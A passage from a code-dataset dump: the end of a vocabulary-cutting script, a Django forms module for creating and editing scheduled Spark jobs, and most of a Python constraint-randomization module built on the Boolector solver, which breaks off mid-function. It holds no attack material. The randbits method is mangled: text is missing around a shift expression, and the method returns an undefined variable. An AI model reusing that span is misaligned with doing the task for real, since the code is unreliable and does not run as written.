outputfile:\n outputfile.write('\\n'.join(cut_vocab))\n","repo_name":"cmimprota/CSR","sub_path":"vocabularies/cuttings/cut_vocab_most_frequent.py","file_name":"cut_vocab_most_frequent.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3279496044","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, you can obtain one at http://mozilla.org/MPL/2.0/.\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.utils import dateformat, timezone\nfrom django.utils.safestring import mark_safe\n\nfrom . import models\nfrom ..clusters.forms import EMRReleaseChoiceField\nfrom ..forms.fields import CachedFileField\nfrom ..forms.mixins import (AutoClassFormMixin, CachedFileModelFormMixin,\n CreatedByModelFormMixin)\n\n\nclass BaseSparkJobForm(AutoClassFormMixin, CachedFileModelFormMixin,\n CreatedByModelFormMixin, forms.ModelForm):\n \"\"\"\n A base form used for creating new jobs.\n \"\"\"\n identifier = forms.RegexField(\n required=True,\n label='Identifier',\n regex=r'^[a-z0-9-]{1,100}$',\n widget=forms.TextInput(attrs={\n 'pattern': r'[a-z0-9-]{1,100}',\n 'data-parsley-pattern-message': 'Identifier contains invalid characters.',\n }),\n help_text='A unique identifier for your Spark job, visible in '\n 'the AWS management console. (Lowercase, use hyphens '\n 'instead of spaces.)'\n )\n description = forms.CharField(\n required=True,\n label='Description',\n strip=True,\n widget=forms.Textarea(attrs={\n 'rows': 2,\n }),\n help_text=\"A brief description of your Spark job's purpose. \"\n \"This is intended to provide extra context for the \"\n \"data engineering team.\"\n )\n result_visibility = forms.ChoiceField(\n required=True,\n choices=models.SparkJob.RESULT_VISIBILITY_CHOICES,\n widget=forms.RadioSelect(attrs={\n 'class': 'radioset',\n }),\n label='Result visibility',\n help_text='Whether notebook results are uploaded to a public '\n 'or private S3 bucket.',\n )\n size = forms.IntegerField(\n required=True,\n min_value=1,\n max_value=settings.AWS_CONFIG['MAX_CLUSTER_SIZE'],\n label='Cluster size',\n widget=forms.NumberInput(attrs={\n 'min': '1',\n 'max': str(settings.AWS_CONFIG['MAX_CLUSTER_SIZE']),\n }),\n help_text='Number of workers to use when running the Spark job '\n '(1 is recommended for testing or development).'\n )\n interval_in_hours = forms.ChoiceField(\n required=True,\n choices=models.SparkJob.INTERVAL_CHOICES,\n widget=forms.RadioSelect(attrs={\n 'class': 'radioset',\n }),\n label='Run interval',\n help_text='Interval at which the Spark job should be run.',\n )\n job_timeout = forms.IntegerField(\n required=True,\n min_value=1,\n max_value=24,\n label='Timeout',\n widget=forms.NumberInput(attrs={\n 'min': '1',\n 'max': '24',\n }),\n help_text='Number of hours that a single run of the job can run '\n 'for before timing out and being terminated.'\n )\n start_date = forms.DateTimeField(\n required=True,\n widget=forms.DateTimeInput(attrs={\n 'class': 'datetimepicker',\n }),\n label='Start date',\n help_text='Date and time of when the scheduled Spark job should '\n 'start running.',\n )\n end_date = forms.DateTimeField(\n required=False,\n widget=forms.DateTimeInput(attrs={\n 'class': 'datetimepicker',\n }),\n label='End date',\n help_text='Date and time of when the scheduled Spark job should '\n 'stop running - leave this blank if the job should '\n 'not be disabled.',\n )\n notebook = CachedFileField(\n required=True,\n widget=forms.FileInput(attrs={\n 'accept': '.ipynb, .json',\n }),\n label='Analysis Jupyter/Zeppelin Notebook',\n help_text='A Jupyter (.ipynb) or Zeppelin (.json) Notebook.'\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n now = dateformat.format(timezone.now(), settings.DATETIME_FORMAT)\n self.fields['start_date'].label = mark_safe(\n '%s (UTC) Currently: %s' %\n (self.fields['start_date'].label, now)\n )\n self.fields['end_date'].label = mark_safe(\n '%s (UTC) Currently: %s' %\n (self.fields['end_date'].label, now)\n )\n\n class Meta:\n model = models.SparkJob\n fields = [\n 'identifier', 'description', 'result_visibility', 'size',\n 'interval_in_hours', 'job_timeout', 'start_date', 'end_date'\n ]\n\n @property\n def field_order(self):\n \"\"\"\n Copy the defined model form fields and insert the\n notebook field at the second spot\n \"\"\"\n fields = self._meta.fields[:]\n fields.insert(2, 'notebook')\n return fields\n\n def clean_notebook(self):\n \"\"\"\n Validate the uploaded notebook file if it ends with the\n ipynb file extension.\n \"\"\"\n notebook_file = self.cleaned_data['notebook']\n if notebook_file and not notebook_file.name.endswith(('.ipynb', '.json')):\n raise forms.ValidationError('Only Jupyter/Zeppelin Notebooks are '\n 'allowed to be uploaded')\n return notebook_file\n\n def save(self, commit=True):\n \"\"\"\n Store the notebook file on S3 and save the Spark job details\n to the datebase.\n \"\"\"\n # create the model without committing, since we haven't\n # set the required created_by field yet\n spark_job = super().save(commit=False)\n # if notebook was specified, replace the current notebook\n if 'notebook' in self.changed_data:\n spark_job.notebook_s3_key = self.instance.provisioner.add(\n identifier=self.cleaned_data['identifier'],\n notebook_file=self.cleaned_data['notebook']\n )\n\n if commit: # pragma: no cover\n # actually save the scheduled Spark job, and return the model object\n spark_job.save()\n return spark_job\n\n\nclass NewSparkJobForm(BaseSparkJobForm):\n \"\"\"\n A :class:`~BaseSparkJobForm` subclass used for creating new jobs.\n \"\"\"\n prefix = 'new'\n emr_release = EMRReleaseChoiceField()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['identifier'].widget.attrs.update({\n 'data-parsley-remote': (\n reverse('jobs-identifier-available') + '?identifier={value}'\n ),\n 'data-parsley-remote-reverse': 'true',\n 'data-parsley-remote-message': 'Identifier unavailable',\n 'data-parsley-debounce': '500',\n })\n\n class Meta(BaseSparkJobForm.Meta):\n fields = BaseSparkJobForm.Meta.fields + ['emr_release']\n\n\nclass EditSparkJobForm(BaseSparkJobForm):\n \"\"\"\n A :class:`~BaseSparkJobForm` subclass used for editing jobs.\n \"\"\"\n prefix = 'edit'\n notebook = CachedFileField(\n required=False,\n widget=forms.FileInput(attrs={'accept': '.ipynb, .json'}),\n label='Analysis Jupyter/Zeppelin Notebook',\n help_text='A Jupyter (.ipynb) or Zeppelin (.json) Notebook.',\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['identifier'].disabled = True\n self.fields['notebook'].help_text += (\n '
Current notebook: %s' % self.instance.notebook_name\n )\n self.fields['start_date'].help_text += (\n 'Changing this field will reset the job schedule. '\n 'Only future dates are allowed.'\n )\n\n def clean_start_date(self):\n if ('start_date' in self.changed_data and\n self.cleaned_data['start_date'] < timezone.now()):\n raise forms.ValidationError(\n 'You can only move the start date to a future date'\n )\n return self.cleaned_data['start_date']\n\n\nclass SparkJobAvailableForm(forms.Form):\n \"\"\"\n A form used in the views that checks for the availability of identifiers.\n \"\"\"\n identifier = forms.CharField(required=True)\n","repo_name":"rizplate/telemetry-analysis-service","sub_path":"atmo/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"26302382909","text":"import random\nimport sys\nimport time\nfrom typing import List, Dict\n\nfrom pyboolector import Boolector, BoolectorNode\nimport pyboolector\nfrom vsc.constraints import constraint, soft\nfrom vsc.model.bin_expr_type import BinExprType\nfrom vsc.model.constraint_model import ConstraintModel\nfrom vsc.model.constraint_soft_model import ConstraintSoftModel\nfrom vsc.model.expr_bin_model import ExprBinModel\nfrom vsc.model.expr_fieldref_model import ExprFieldRefModel\nfrom vsc.model.expr_literal_model import ExprLiteralModel\nfrom vsc.model.expr_model import ExprModel\nfrom vsc.model.field_model import FieldModel\nfrom vsc.model.field_scalar_model import FieldScalarModel\nfrom vsc.model.model_visitor import ModelVisitor\nfrom vsc.model.rand_if import RandIF\nfrom vsc.model.rand_info import RandInfo\nfrom vsc.model.rand_info_builder import RandInfoBuilder\nfrom vsc.model.variable_bound_model import VariableBoundModel\nfrom vsc.visitors.array_constraint_builder import ArrayConstraintBuilder\nfrom vsc.visitors.constraint_override_rollback_visitor import ConstraintOverrideRollbackVisitor\nfrom vsc.visitors.dist_constraint_builder import DistConstraintBuilder\nfrom vsc.visitors.model_pretty_printer import ModelPrettyPrinter\nfrom vsc.visitors.variable_bound_visitor import VariableBoundVisitor\nfrom vsc.visitors.dynamic_expr_reset_visitor import DynamicExprResetVisitor\nfrom vsc.model.solve_failure import SolveFailure\nfrom vsc.visitors.ref_fields_postrand_visitor import RefFieldsPostRandVisitor\nfrom vsc.model.rand_set_node_builder import RandSetNodeBuilder\nfrom vsc.model.rand_set_dispose_visitor import RandSetDisposeVisitor\nfrom vsc.visitors.clear_soft_priority_visitor import ClearSoftPriorityVisitor\nfrom vsc.profile import randomize_start, randomize_done, profile_on\nfrom vsc.model.source_info import SourceInfo\nfrom vsc.profile.solve_info import SolveInfo\nfrom vsc.visitors.lint_visitor import LintVisitor\nfrom pip._internal.cli.cmdoptions import src\nfrom vsc.model.solvegroup_swizzler_range import SolveGroupSwizzlerRange\nfrom vsc.model.solvegroup_swizzler_partsel import SolveGroupSwizzlerPartsel\nfrom vsc.impl.ctor import glbl_debug, glbl_solvefail_debug\n\n\nclass Randomizer(RandIF):\n \"\"\"Implements the core randomization algorithm\"\"\"\n \n EN_DEBUG = False\n \n def __init__(self, debug=0, lint=0, solve_fail_debug=0, solve_info=None):\n self.pretty_printer = ModelPrettyPrinter()\n self.solve_info = solve_info\n self.debug = debug\n if glbl_debug > 0 and glbl_debug > debug:\n self.debug = glbl_debug\n\n self.lint = lint\n self.solve_fail_debug = solve_fail_debug\n if glbl_solvefail_debug > 0 and glbl_solvefail_debug > solve_fail_debug:\n self.solve_fail_debug = glbl_solvefail_debug\n \n# self.swizzler = SolveGroupSwizzlerRange(solve_info)\n self.swizzler = SolveGroupSwizzlerPartsel(solve_info)\n \n _state_p = [0,1]\n _rng = None\n \n def randomize(self, ri : RandInfo, bound_m : Dict[FieldModel,VariableBoundModel]):\n \"\"\"Randomize the variables and constraints in a RandInfo collection\"\"\"\n \n if self.solve_info is not None:\n self.solve_info.n_randsets = len(ri.randsets())\n \n if self.debug > 0:\n rs_i = 0\n while rs_i < len(ri.randsets()):\n rs = ri.randsets()[rs_i]\n print(\"RandSet[%d]\" % rs_i)\n for f in rs.all_fields():\n if f in bound_m.keys():\n print(\" Field: %s is_rand=%s %s\" % (f.fullname, str(f.is_used_rand), str(bound_m[f].domain.range_l)))\n else:\n print(\" Field: %s is_rand=%s (unbounded)\" % (f.fullname, str(f.is_used_rand)))\n \n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True))\n \n rs_i += 1\n \n for uf in ri.unconstrained():\n print(\"Unconstrained: \" + uf.fullname)\n \n # Assign values to the unconstrained fields first\n uc_rand = list(filter(lambda f:f.is_used_rand, ri.unconstrained()))\n for uf in uc_rand:\n if self.debug > 0:\n print(\"Randomizing unconstrained: \" + uf.fullname)\n bounds = bound_m[uf]\n range_l = bounds.domain.range_l\n \n if len(range_l) == 1:\n # Single (likely domain-based) range\n uf.set_val(\n self.randint(range_l[0][0], range_l[0][1]))\n else:\n # Most likely an enumerated type\n # TODO: are there any cases where these could be ranges?\n idx = self.randint(0, len(range_l)-1)\n uf.set_val(range_l[idx][0]) \n \n # Lock so we don't overwrite\n uf.set_used_rand(False)\n\n rs_i = 0\n start_rs_i = 0\n# max_fields = 20\n max_fields = 0\n while rs_i < len(ri.randsets()):\n btor = Boolector()\n self.btor = btor\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n \n start_rs_i = rs_i\n\n constraint_l = []\n soft_constraint_l = []\n \n # Collect up to max_fields fields to randomize at a time\n n_fields = 0\n while rs_i < len(ri.randsets()):\n rs = ri.randsets()[rs_i]\n \n rs_node_builder = RandSetNodeBuilder(btor)\n\n all_fields = rs.all_fields()\n if self.debug > 0:\n print(\"Pre-Randomize: RandSet[%d]\" % rs_i)\n for f in all_fields:\n if f in bound_m.keys():\n print(\" Field: %s is_rand=%s %s var=%s\" % (f.fullname, str(f.is_used_rand), str(bound_m[f].domain.range_l), str(f.var)))\n else:\n print(\" Field: %s is_rand=%s (unbounded)\" % (f.fullname, str(f.is_used_rand)))\n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n \n if self.solve_info is not None:\n self.solve_info.n_cfields += len(all_fields)\n\n rs_node_builder.build(rs)\n n_fields += len(all_fields)\n \n# constraint_l.extend(list(map(lambda c:(c,c.build(btor),isinstance(c,ConstraintSoftModel)), rs.constraints())))\n constraint_l.extend(list(map(lambda c:(c,c.build(btor)), rs.constraints())))\n soft_constraint_l.extend(list(map(lambda c:(c,c.build(btor)), rs.soft_constraints())))\n \n # Sort the list in descending order so we know which constraints\n # to prioritize\n soft_constraint_l.sort(key=lambda c:c[0].priority, reverse=True)\n \n rs_i += 1\n if n_fields > max_fields or rs.order != -1:\n break\n \n for c in constraint_l:\n try:\n btor.Assume(c[1])\n except Exception as e:\n print(\"Exception: \" + self.pretty_printer.print(c[0]))\n raise e\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n \n if btor.Sat() != btor.SAT:\n # If the system doesn't solve with hard constraints added,\n # then we may as well bail now\n active_randsets = []\n for rs in ri.randsets():\n active_randsets.append(rs)\n for f in rs.all_fields():\n f.dispose()\n \n if self.solve_fail_debug > 0:\n raise SolveFailure(\n \"solve failure\",\n self.create_diagnostics(active_randsets))\n else:\n raise SolveFailure(\n \"solve failure\",\n \"Solve failure: set 'solve_fail_debug=1' for more details\")\n else:\n # Lock down the hard constraints that are confirmed\n # to be valid\n for c in constraint_l:\n btor.Assert(c[1])\n\n # If there are soft constraints, add these now\n if len(soft_constraint_l) > 0: \n for c in soft_constraint_l:\n try:\n btor.Assume(c[1])\n except Exception as e:\n from ..visitors.model_pretty_printer import ModelPrettyPrinter\n print(\"Exception: \" + ModelPrettyPrinter.print(c[0]))\n raise e\n\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n if btor.Sat() != btor.SAT:\n # All the soft constraints cannot be satisfied. We'll need to\n # add them incrementally\n if self.debug > 0:\n print(\"Note: some of the %d soft constraints could not be satisfied\" % len(soft_constraint_l))\n \n for c in soft_constraint_l:\n btor.Assume(c[1])\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n if btor.Sat() == btor.SAT:\n if self.debug > 0:\n print(\"Note: soft constraint %s (%d) passed\" % (\n self.pretty_printer.print(c[0]), c[0].priority))\n btor.Assert(c[1])\n else:\n if self.debug > 0:\n print(\"Note: soft constraint %s (%d) failed\" % (\n self.pretty_printer.print(c[0]), c[0].priority))\n else:\n # All the soft constraints could be satisfied. Assert them now\n if self.debug > 0:\n print(\"Note: all %d soft constraints could be satisfied\" % len(soft_constraint_l))\n for c in soft_constraint_l:\n btor.Assert(c[1])\n \n# btor.Sat()\n x = start_rs_i\n while x < rs_i:\n self.swizzler.swizzle(\n btor,\n ri.randsets()[x],\n bound_m)\n x += 1\n \n # Finalize the value of the field\n x = start_rs_i\n reset_v = DynamicExprResetVisitor()\n while x < rs_i:\n rs = ri.randsets()[x]\n for f in rs.all_fields():\n f.post_randomize()\n f.set_used_rand(False, 0)\n f.dispose() # Get rid of the solver var, since we're done with it\n f.accept(reset_v)\n# for f in rs.nontarget_field_s:\n# f.dispose()\n for c in rs.constraints():\n c.accept(reset_v)\n RandSetDisposeVisitor().dispose(rs)\n \n if self.debug > 0:\n print(\"Post-Randomize: RandSet[%d]\" % x)\n for f in all_fields:\n if f in bound_m.keys():\n print(\" Field: %s %s\" % (f.fullname, str(f.val.val)))\n else:\n print(\" Field: %s (unbounded) %s\" % (f.fullname, str(f.val.val)))\n \n for c in rs.constraints():\n print(\" Constraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n for c in rs.soft_constraints():\n print(\" SoftConstraint: \" + self.pretty_printer.do_print(c, show_exp=True, print_values=True))\n \n x += 1\n \n \n end = int(round(time.time() * 1000))\n\n def swizzle_randvars(self, \n btor : Boolector, \n ri : RandInfo,\n start_rs : int,\n end_rs : int,\n bound_m : Dict[FieldModel,VariableBoundModel]):\n\n # TODO: we must ignore fields that are otherwise being controlled\n if self.debug > 0:\n print(\"--> swizzle_randvars\")\n\n rand_node_l = []\n rand_e_l = []\n x=start_rs\n swizzled_field = False\n while x < end_rs:\n # For each random variable, select a partition with it's known \n # domain and add the corresponding constraint\n rs = ri.randsets()[x]\n field_l = rs.rand_fields()\n \n if self.debug > 0:\n print(\" \" + str(len(field_l)) + \" fields in randset\")\n \n if rs.rand_order_l is not None:\n # Perform an ordered randomization\n for ro_l in rs.rand_order_l:\n swizzled_field |= self.swizzle_field_l(ro_l, rs, bound_m, btor)\n else:\n swizzled_field |= self.swizzle_field_l(rs.rand_fields(), rs, bound_m, btor)\n \n x += 1\n \n if not swizzled_field:\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1 \n btor.Sat()\n \n if self.debug > 0:\n print(\"<-- swizzle_randvars\")\n \n def swizzle_field_l(self, field_l, rs, bound_m, btor):\n e = None\n if len(field_l) > 0:\n # Make a copy of the field list so we don't\n # destroy the original\n field_l = field_l.copy()\n \n swizzle_node_l = []\n swizzle_expr_l = []\n max_swizzle = 4\n\n # Select up to `max_swizzle` fields to swizzle \n for i in range(max_swizzle):\n if len(field_l) > 0:\n field_idx = self.randint(0, len(field_l)-1)\n f = field_l.pop(field_idx)\n e = self.swizzle_field(f, rs, bound_m)\n if e is not None:\n swizzle_expr_l.append(e)\n swizzle_node_l.append(e.build(btor))\n else:\n break\n \n while len(swizzle_node_l) > 0:\n # Start by assuming all\n for n in swizzle_node_l:\n btor.Assume(n)\n\n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n if btor.Sat() != btor.SAT:\n e = swizzle_expr_l.pop()\n n = swizzle_node_l.pop()\n if self.debug > 0:\n print(\"Randomization constraint failed. Removing last: %s\" %\n self.pretty_printer.print(e))\n else:\n # Randomization constraints succeeded. Go ahead and assert\n for n in swizzle_node_l:\n btor.Assert(n)\n break\n \n if self.solve_info is not None:\n self.solve_info.n_sat_calls += 1\n if btor.Sat() != btor.SAT:\n raise Exception(\"failed to add in randomization (2)\") \n return True\n else:\n return False\n \n \n def swizzle_field(self, f, rs, bound_m) -> ExprModel:\n ret = None\n \n if self.debug > 0:\n print(\"Swizzling field %s\" % f.name)\n \n if f in rs.dist_field_m.keys():\n if self.debug > 0:\n print(\"Note: field %s is in dist map\" % f.name)\n for d in rs.dist_field_m[f]:\n print(\" Target interval %d\" % d.target_range)\n if len(rs.dist_field_m[f]) > 1:\n target_d = self.randint(0, len(rs.dist_field_m[f])-1)\n dist_scope_c = rs.dist_field_m[f][target_d]\n else:\n dist_scope_c = rs.dist_field_m[f][0]\n \n target_w = dist_scope_c.dist_c.weights[dist_scope_c.target_range]\n if target_w.rng_rhs is not None:\n # Dual-bound range\n val_l = target_w.rng_lhs.val()\n val_r = target_w.rng_rhs.val()\n val = self.randint(val_l, val_r)\n if self.debug > 0:\n print(\"Select dist-weight range: %d..%d ; specific value %d\" % (\n int(val_l), int(val_r), int(val)))\n ret = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(val, f.is_signed, f.width))\n else:\n # Single value\n val = target_w.rng_lhs.val()\n ret = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(int(val), f.is_signed, f.width))\n else:\n if f in bound_m.keys():\n f_bound = bound_m[f]\n if not f_bound.isEmpty():\n ret = self.create_rand_domain_constraint(f, f_bound)\n \n return ret\n# if e is not None:\n# n = e.build(btor)\n# rand_node_l.append(n)\n# rand_e_l.append(e)\n \n def create_rand_domain_constraint(self, \n f : FieldScalarModel, \n bound_m : VariableBoundModel)->ExprModel:\n e = None\n range_l = bound_m.domain.range_l\n range_idx = self.randint(0, len(range_l)-1)\n range = range_l[range_idx]\n domain = range[1]-range[0]\n \n \n if self.debug > 0:\n print(\"create_rand_domain_constraint: \" + f.name + \" range_idx=\" + str(range_idx) + \" range=\" + str(range))\n if domain > 64:\n r_type = self.randint(0, 3)\n r_type = 3 # Note: hard-coded to selecting single value for \n single_val = self.randint(range[0], range[1])\n \n if r_type >= 0 and r_type <= 2: # range\n # Pretty simple. Partition and randomize\n# bin_sz_h = 1 if int(domain/128) == 0 else int(domain/128)\n bin_sz_h = 1 if int(domain/128) == 0 else int(domain/128)\n\n if r_type == 0: \n # Center value in bin\n if single_val+bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val+bin_sz_h\n min = single_val-bin_sz_h\n \n if self.debug > 0:\n print(\"rand_domain range-type is bin center value: center=%d => %d..%d\" % (single_val,min,max))\n elif r_type == 1:\n # Bin starts at value\n if single_val+2*bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-2*bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val+2*bin_sz_h\n min = single_val\n if self.debug > 0:\n print(\"rand_domain range-type is bin left-target value: left=%d %d..%d\" % (single_val, min,max))\n elif r_type == 2:\n # Bin ends at value\n if single_val+2*bin_sz_h > range[1]:\n max = range[1]\n min = range[1]-2*bin_sz_h\n elif single_val-2*bin_sz_h < range[0]:\n max = range[0]+2*bin_sz_h\n min = range[0]\n else:\n max = single_val\n min = single_val-2*bin_sz_h\n \n if self.debug > 0:\n print(\"rand_domain range-type is bin right-target value: left=%d %d..%d\" % (single_val, min,max))\n \n e = ExprBinModel(\n ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Ge,\n ExprLiteralModel(\n min,\n f.is_signed, \n f.width)\n ),\n BinExprType.And,\n ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Le,\n ExprLiteralModel(\n max,\n f.is_signed, \n f.width)\n )\n )\n elif r_type == 3: # Single value\n if self.debug > 0:\n print(\"rand_domain range-type is single value: %d\" % single_val)\n e = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(single_val, f.is_signed, f.width))\n else:\n val = self.randint(range[0], range[1])\n if self.debug > 0:\n print(\"rand_domain on small domain [%d..%d] => %d\" % (range[0], range[1], val))\n e = ExprBinModel(\n ExprFieldRefModel(f),\n BinExprType.Eq,\n ExprLiteralModel(val, f.is_signed, f.width))\n\n return e\n \n def randint(self, low, high):\n if low > high:\n tmp = low\n low = high\n high = tmp\n\n return random.randint(low,high)\n\n def randbits(self, nbits):\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n# return Randomizer._rng.randint(0, (1<> 9))\n# ^ Randomizer._state_p[1] ^ (Randomizer._state_p[1] << 14))\n# Randomizer._state_p[1] = (Randomizer._state_p[1] << 36) | (Randomizer._state_p[1] >> 28)\n \n return ret\n\n def create_diagnostics_1(self, active_randsets) -> str:\n ret = \"\"\n \n btor = Boolector()\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n model_valid = False\n \n diagnostic_constraint_l = [] \n diagnostic_field_l = []\n \n # First, determine how many randsets are actually failing\n i = 0\n while i < len(active_randsets):\n rs = active_randsets[i]\n for f in rs.all_fields():\n f.build(btor)\n\n # Assume that we can omit all soft constraints, since they\n # will have already been omitted (?) \n constraint_l = list(map(lambda c:(c,c.build(btor)), filter(lambda c:not isinstance(c,ConstraintSoftModel), rs.constraints())))\n \n for c in constraint_l:\n btor.Assume(c[1])\n\n if btor.Sat() != btor.SAT:\n # Save fields and constraints if the randset doesn't \n # solve on its own\n diagnostic_constraint_l.extend(constraint_l)\n diagnostic_field_l.extend(rs.fields())\n \n i += 1\n \n\n problem_constraints = []\n solving_constraints = []\n # Okay, now perform a series of solves to identify\n # constraints that are actually a problem\n for c in diagnostic_constraint_l:\n btor.Assume(c[1])\n model_valid = False\n \n if btor.Sat() != btor.SAT:\n # This is a problematic constraint\n # Save it for later\n problem_constraints.append(c[0])\n else:\n # Not a problem. Assert it now\n btor.Assert(c[1])\n solving_constraints.append(c[0])\n model_valid = True\n# problem_constraints.append(c[0])\n \n if btor.Sat() != btor.SAT:\n raise Exception(\"internal error: system should solve\")\n \n # Okay, we now have a constraint system that solves, and\n # a list of constraints that are a problem. We want to \n # resolve the value of all variables referenced by the \n # solving constraints so and then display the non-solving\n # constraints. This will (hopefully) help highlight the\n # reason for the failure\n for c in solving_constraints:\n c.accept(RefFieldsPostRandVisitor())\n\n ret += \"Problem Constraints:\\n\"\n for i,pc in enumerate(problem_constraints):\n\n ret += \"Constraint %d: %s\\n\" % (i, SourceInfo.toString(pc.srcinfo))\n ret += ModelPrettyPrinter.print(pc, print_values=True)\n ret += ModelPrettyPrinter.print(pc, print_values=False)\n\n for rs in active_randsets:\n for f in rs.all_fields():\n f.dispose()\n \n return ret\n\n def create_diagnostics(self, active_randsets) -> str:\n \n btor = Boolector()\n btor.Set_opt(pyboolector.BTOR_OPT_INCREMENTAL, True)\n btor.Set_opt(pyboolector.BTOR_OPT_MODEL_GEN, True)\n model_valid = False\n \n diagnostic_constraint_l = [] \n diagnostic_field_l = []\n \n # First, determine how many randsets are actually failing\n i = 0\n while i < len(active_randsets):\n rs = active_randsets[i]\n for f in rs.all_fields():\n f.build(btor)\n\n # Assume that we can omit all soft constraints, since they\n # will have already been omitted (?) \n constraint_l = list(map(lambda c:(c,c.build(btor)), filter(lambda c:not isinstance(c,ConstraintSoftModel), rs.constraints())))\n \n for c in constraint_l:\n btor.Assume(c[1])\n\n if btor.Sat() != btor.SAT:\n # Save fields and constraints if the randset doesn't \n # solve on its own\n diagnostic_constraint_l.extend(constraint_l)\n diagnostic_field_l.extend(rs.fields())\n \n i += 1\n \n problem_sets = []\n degree = 1\n \n while True:\n init_size = len(diagnostic_constraint_l)\n tmp_l = []\n\n ret = self._collect_failing_constraints(\n btor, \n diagnostic_constraint_l,\n 0, \n degree,\n tmp_l,\n problem_sets)\n \n if len(diagnostic_constraint_l) == init_size and degree > 3:\n break\n else:\n degree += 1\n\n if Randomizer.EN_DEBUG > 0:\n print(\"%d constraints remaining ; %d problem sets\" % (len(diagnostic_constraint_l), len(problem_sets)))\n\n # Assert the remaining constraints\n for c in diagnostic_constraint_l:\n btor.Assert(c[1])\n \n if btor.Sat() != btor.SAT:\n raise Exception(\"internal error: system should solve\")\n \n # Okay, we now have a constraint system that solves, and\n # a list of constraints that are a problem. We want to \n # resolve the value of all variables referenced by the \n # solving constraints so and then display the non-solving\n # constraints. This will (hopefully) help highlight the\n # reason for the failure\n \n ret = \"\"\n for ps in problem_sets:\n ret += (\"Problem Set: %d constraints\\n\" % len(ps))\n for pc in ps:\n ret += \" %s:\\n\" % SourceInfo.toString(pc[0].srcinfo)\n ret += \" %s\" % ModelPrettyPrinter.print(pc[0], print_values=False)\n\n pc = []\n for c in ps:\n pc.append(c[0])\n \n lint_r = LintVisitor().lint(\n [],\n pc)\n \n if lint_r != \"\":\n ret += \"Lint Results:\\n\" + lint_r\n \n for rs in active_randsets:\n for f in rs.all_fields():\n f.dispose()\n \n return ret \n \n def _collect_failing_constraints(self,\n btor,\n src_constraint_l,\n idx,\n max,\n tmp_l,\n fail_set_l):\n ret = False\n if len(tmp_l) < max:\n i = idx\n while i < len(src_constraint_l):\n tmp_l.append(i)\n ret = self._collect_failing_constraints(\n btor, src_constraint_l, i+1, max, tmp_l, fail_set_l)\n tmp_l.pop()\n if ret:\n src_constraint_l.pop(i)\n else:\n i += 1\n else:\n # Assume full set of collected constraints\n if Randomizer.EN_DEBUG:\n print(\"Assume: \" + str(tmp_l))\n for c in tmp_l:\n btor.Assume(src_constraint_l[c][1])\n if btor.Sat() != btor.SAT:\n # Set failed. Add to fail_set\n fail_s = []\n for ci in tmp_l:\n fail_s.append(src_constraint_l[ci])\n fail_set_l.append(tuple(fail_s))\n ret = True\n \n return ret\n\n \n @staticmethod\n def do_randomize(\n srcinfo : SourceInfo,\n field_model_l : List[FieldModel],\n constraint_l : List[ConstraintModel] = None,\n debug=0,\n lint=0,\n solve_fail_debug=0):\n if profile_on():\n solve_info = SolveInfo()\n solve_info.totaltime = time.time()\n randomize_start(srcinfo, field_model_l, constraint_l)\n else:\n solve_info = None\n \n # All fields passed to do_randomize are treated\n # as randomizable\n# if Randomizer._rng is None:\n# Randomizer._rng = random.Random(random.randrange(sys.maxsize))\n# seed = Randomizer._rng.randint(0, (1 << 64)-1)\n \n seed = random.randint(0, (1<<64)-1)\n \n clear_soft_priority = ClearSoftPriorityVisitor()\n \n for f in field_model_l:\n f.set_used_rand(True, 0)\n clear_soft_priority.clear(f)\n \n if debug > 0: \n print(\"Initial Model:\") \n for fm in field_model_l:\n print(\" \" + ModelPrettyPrinter.print(fm))\n \n # First, invoke pre_randomize on all elements\n for fm in field_model_l:\n fm.pre_randomize()\n \n if constraint_l is None:\n constraint_l = []\n \n for c in constraint_l:\n clear_soft_priority.clear(c)\n\n # Collect all variables (pre-array) and establish bounds \n bounds_v = VariableBoundVisitor()\n bounds_v.process(field_model_l, constraint_l, False)\n\n # TODO: need to handle inline constraints that impact arrays\n constraints_len = len(constraint_l)\n for fm in field_model_l:\n 